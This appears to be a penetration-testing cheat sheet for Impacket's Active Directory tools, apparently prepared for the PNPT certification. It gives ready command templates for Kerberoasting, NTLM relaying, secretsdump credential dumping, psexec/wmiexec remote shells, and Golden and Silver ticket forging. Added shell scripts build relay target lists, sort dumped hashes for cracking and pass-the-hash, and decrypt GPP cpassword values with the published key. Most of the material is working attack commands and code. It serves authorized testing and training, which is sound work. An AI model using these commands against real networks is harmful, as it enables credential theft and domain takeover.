Kerberoasting (GetUserSPNs.py)

Request service tickets (TGS) for every domain account that has an SPN set. Any authenticated domain user can do this; each ticket is encrypted with the service account's password hash, so it can be cracked offline. Add -outputfile to write the hashes straight into hashcat/john format. RC4 (etype 23) tickets crack far faster than AES ones, so check the etype before choosing a hashcat mode.

impacket-GetUserSPNs -dc-ip {{dc_ip}} {{domain}}/{{user}}:{{password}} -request

SMB Relay Attack (ntlmrelayx.py)

Listen for incoming NTLM authentications (usually poisoned or coerced with Responder, run with its SMB and HTTP servers turned off so that ntlmrelayx receives them) and relay them to the hosts in {{targets_file}}, one target per line in the form smb://ip. Relaying to SMB only works against hosts that do not require SMB signing, so scan for that first; domain controllers require it by default. -socks keeps every relayed session open on a local SOCKS proxy so you can use it later with other tools instead of dumping SAM immediately.

impacket-ntlmrelayx -tf {{targets_file}} -smb2support -socks
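Building the targets file, as an added example (not Impacket code): filter a signing scan down to the hosts that can actually be relayed to. The input lines are constructed in the style CrackMapExec/NetExec print for an smb scan; only the "(signing:False)" token and the IP in the second column are relied on, so adjust the pattern if your scanner prints differently.

```shell
#!/bin/sh
# Added example (not Impacket code): turn a signing scan into the -tf file.
# Sample lines are constructed in CrackMapExec/NetExec style; the only parts
# used are the IP (second column) and the "(signing:False)" token.

# Print "smb://<ip>" for each host whose SMB signing is not required, skipping
# any IP listed in $1 (space separated: your own box, hosts out of scope, the
# host the auth is coming from, since relaying back to origin is blocked).
# Duplicate scan lines for the same host collapse to one target.
relay_targets() {
    exclude=" $1 "
    grep -F '(signing:False)' | awk '{print $2}' | sort -u | while read -r ip; do
        case "$exclude" in
            *" $ip "*) ;;
            *) printf 'smb://%s\n' "$ip" ;;
        esac
    done
}

# Constructed scan output: the DC requires signing (drops out), FS01 is listed
# twice, and WS09 will be excluded by the caller.
SAMPLE_SCAN='SMB         10.0.0.5        445    FS01             [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.1        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    WS07             [*] Windows 10.0 Build 19041 x64 (name:WS07) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.9        445    WS09             [*] Windows 10.0 Build 19041 x64 (name:WS09) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.5        445    FS01             [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)'

# Typical use: relay_targets "10.0.0.9" < scan.txt > targets.txt
#              impacket-ntlmrelayx -tf targets.txt -smb2support -socks
```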

Credential Dumping (secretsdump.py)

Remotely dump a host's local SAM hashes, LSA secrets and cached domain logons (DCC2), or pull every domain hash out of NTDS.dit. Against a domain controller it uses DRSUAPI replication (the same mechanism as DCSync), so an account with replication rights is enough and no file has to be copied off the DC; add -just-dc-ntlm when you only want the NT hashes. It does not read LSASS memory. With Kerberos the target must be a hostname, not an IP, and the ticket comes from KRB5CCNAME.

impacket-secretsdump {{domain}}/{{user}}:{{password}}@{{target}}
KRB5CCNAME={{ticket.ccache}} impacket-secretsdump -k -no-pass {{domain}}/{{user}}@{{target_fqdn}} # Using Kerberos (ticket required)
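Triage of the dump, as an added example (not Impacket code): pull the hashcat-ready NT hashes out of secretsdump output, flag accounts with a blank password or a real LM hash, and separate cached-credential entries. The dump is a constructed sample with fake hashes (svc_legacy carries the well-known LM/NT hashes of the string "password"); it mixes lines from a DCSync and from a workstation dump so every branch is exercised.

```shell
#!/bin/sh
# Added example (not Impacket code): triage secretsdump.py output.
# The sample dump below is constructed; hashes are fake except svc_legacy,
# which uses the public LM/NT hashes of "password".

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of "" = no LM hash stored
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of "" = blank password

# Normalise "user:rid:lm:nt:::" lines to "user:rid:lm:nt". Drops status lines,
# Kerberos key lines, DCC2 entries, password-history entries (user_history0,
# ...) and the "domain\" prefix secretsdump puts on some accounts.
sam_lines() {
    awk -F: 'NF == 7 && $2 ~ /^[0-9]+$/ && length($3) == 32 && length($4) == 32 {
        user = $1; sub(/^.*\\/, "", user)
        if (user ~ /_history[0-9]+$/) next
        print user ":" $2 ":" $3 ":" $4
    }'
}

# "user:nthash" per account: hashcat -m 1000 with --username, or pass-the-hash.
nt_hashes()       { sam_lines | awk -F: '{print $1 ":" $4}'; }

# Accounts whose NT hash is the hash of the empty string.
blank_passwords() { sam_lines | awk -F: -v e="$EMPTY_NT" '$4 == e {print $1}'; }

# Accounts that still have a real LM hash (LM storage enabled): hashcat -m 3000
# breaks these in minutes, and the result is a case-insensitive hint for the NT one.
lm_present()      { sam_lines | awk -F: -v e="$EMPTY_LM" '$3 != e {print $1}'; }

# Cached domain logons in hashcat -m 2100 form ($DCC2$iterations#user#hash).
dcc2_hashes()     { grep -F '$DCC2$' | cut -d: -f2-; }

SAMPLE_DUMP='[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
corp.local\svc_legacy:1104:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
corp.local\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
corp.local\jdoe_history0:1105:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:00000000000000000000000000000000000000000000000000000000000000aa
[*] Dumping cached domain logon information (domain/username:hash)
corp.local/jdoe:$DCC2$10240#jdoe#ffeeddccbbaa99887766554433221100
[*] Cleaning up...'

# Typical use: nt_hashes < dump.txt > nt.txt; blank_passwords < dump.txt
```

The krbtgt line is the one to protect in your notes: it is the input to a Golden ticket. Blank-password and LM-present accounts are findings in their own right, independent of whether anything cracks.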

Remote Command Execution (psexec.py / wmiexec.py)

Get a shell on a target over SMB or WMI. psexec uploads a service binary to a writable share (normally ADMIN$) and registers it as a service: reliable, but it leaves a service-creation event and a dropped file behind. wmiexec runs each command through WMI and reads the output back over the ADMIN$ share: no service, quieter, but still a file write per command. Both need local administrator rights on the target, and both accept -hashes LMHASH:NTHASH in place of the password for pass-the-hash.

impacket-psexec {{domain}}/{{user}}:{{password}}@{{target}}
impacket-wmiexec {{domain}}/{{user}}:{{password}}@{{target}}

RID Enumeration (lookupsid.py)

Enumerate domain users and groups by brute-forcing RIDs through SID-to-name lookups over LSARPC. Any valid domain credential works, and some hosts still allow it over a null session (blank or guest username with -no-pass). The output also prints the domain SID, which ticketer.py needs.

impacket-lookupsid {{domain}}/{{user}}:{{password}}@{{target}}

Ticket Forging and Pass-the-Ticket (ticketer.py)

Forge a Kerberos ticket. With the krbtgt account's NT hash (from secretsdump) the result is a Golden ticket, a TGT valid for any user in the domain; with a service account's NT hash plus -spn (for example cifs/{{target_fqdn}}) it is a Silver ticket, a service ticket for that one service that never touches the DC. -domain-sid is the domain SID printed by lookupsid.py. The ticket is saved as {{target_user}}.ccache; to pass it, export KRB5CCNAME to that file and run the other scripts with -k -no-pass against a hostname.

impacket-ticketer -nthash {{ntlm_hash}} -domain-sid {{domain_sid}} -domain {{domain}} {{target_user}}

GPP Password Extraction (Get-GPPPassword.py)

Find and decrypt passwords stored in Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml, Printers.xml) on the SYSVOL share. The cpassword attribute is AES-256 encrypted with a key Microsoft itself published, so any domain user who can read SYSVOL gets the plaintext; MS14-025 stopped new ones being created but did not remove existing files, so old policies still leak.

impacket-Get-GPPPassword {{domain}}/{{user}}:{{password}}@{{dc_ip}}
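What the tool does once it has the XML, as an added example (not Get-GPPPassword.py's code): decrypt a cpassword value with openssl using the GPP key Microsoft published, and pull userName/cpassword pairs out of a Groups.xml. It assumes openssl and base64 on the box. GPP no longer produces these values, so the encryption side exists only to build a sample that round-trips; the XML is constructed and minimal.

```shell
#!/bin/sh
# Added example (not the tool's code): decrypt GPP cpassword values by hand.
# GPP_AES_KEY is the key Microsoft published for Group Policy Preferences.
# Needs openssl and base64. The Groups.xml sample is constructed.

GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
ZERO_IV=00000000000000000000000000000000

# cpassword -> plaintext. The value is base64 with the "=" padding stripped,
# AES-256-CBC under the fixed key with a zero IV, and the plaintext is
# UTF-16LE. Dropping the NUL bytes is enough for ASCII passwords; pipe through
# iconv -f UTF-16LE instead for anything else.
gpp_decrypt() {
    cp="$1"
    while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="$cp="; done
    printf '%s' "$cp" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
        | tr -d '\000'
}

# ASCII -> UTF-16LE (each byte followed by a NUL), used only to make test data.
to_utf16le() {
    s="$1"
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}
        printf '%s\000' "$c"
        s=${s#?}
    done
}

# Reverse of gpp_decrypt, for producing a sample cpassword from a password.
gpp_encrypt() {
    to_utf16le "$1" \
        | openssl enc -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
        | base64 | tr -d '=\n'
}

# Read one XML attribute ($1) out of a tag string ($2); empty if absent.
attr() { printf '%s' "$2" | sed -n "s/.*[ ]$1=\"\([^\"]*\)\".*/\1/p"; }

# Print "user:plaintext" for every <Properties .../> tag on stdin that carries
# a cpassword. Groups.xml names the account in userName; ScheduledTasks.xml
# uses runAs, so both are tried.
gpp_xml_creds() {
    grep -o '<Properties[^>]*cpassword="[^"]*"[^>]*/>' | while IFS= read -r tag; do
        user=$(attr userName "$tag")
        [ -n "$user" ] || user=$(attr runAs "$tag")
        printf '%s:%s\n' "$user" "$(gpp_decrypt "$(attr cpassword "$tag")")"
    done
}

# Constructed Groups.xml fragment; the cpassword is generated at load time so
# the decryption can be verified end to end.
SAMPLE_GROUPS_XML="<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Groups><User name=\"svc_backup\" changed=\"2019-03-01 10:00:00\"><Properties action=\"U\" newName=\"\" fullName=\"\" description=\"\" cpassword=\"$(gpp_encrypt 'Backup2019!')\" changeLogon=\"0\" noChange=\"1\" neverExpires=\"1\" acctDisabled=\"0\" userName=\"corp.local\\svc_backup\"/></User></Groups>"

# Typical use: gpp_xml_creds < Groups.xml   (fetched from \\dc\SYSVOL\...\Groups.xml)
```

The fixed key and zero IV are the whole story: there is no per-domain secret involved, which is why a read-only SYSVOL view is sufficient and why the fix had to be "stop writing cpassword" rather than "rotate a key".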

Description

Impacket is a collection of Python classes for working with network protocols (SMB, MSRPC, Kerberos, LDAP and others), shipped with example scripts built on them; on Kali the scripts are installed as impacket-<script>, which is the form used above. In PNPT, these scripts are the standard tooling for the Active Directory attack chain: Kerberoasting, SMB relaying, ticket forging, and credential dumping from the NTDS database or from a single host.
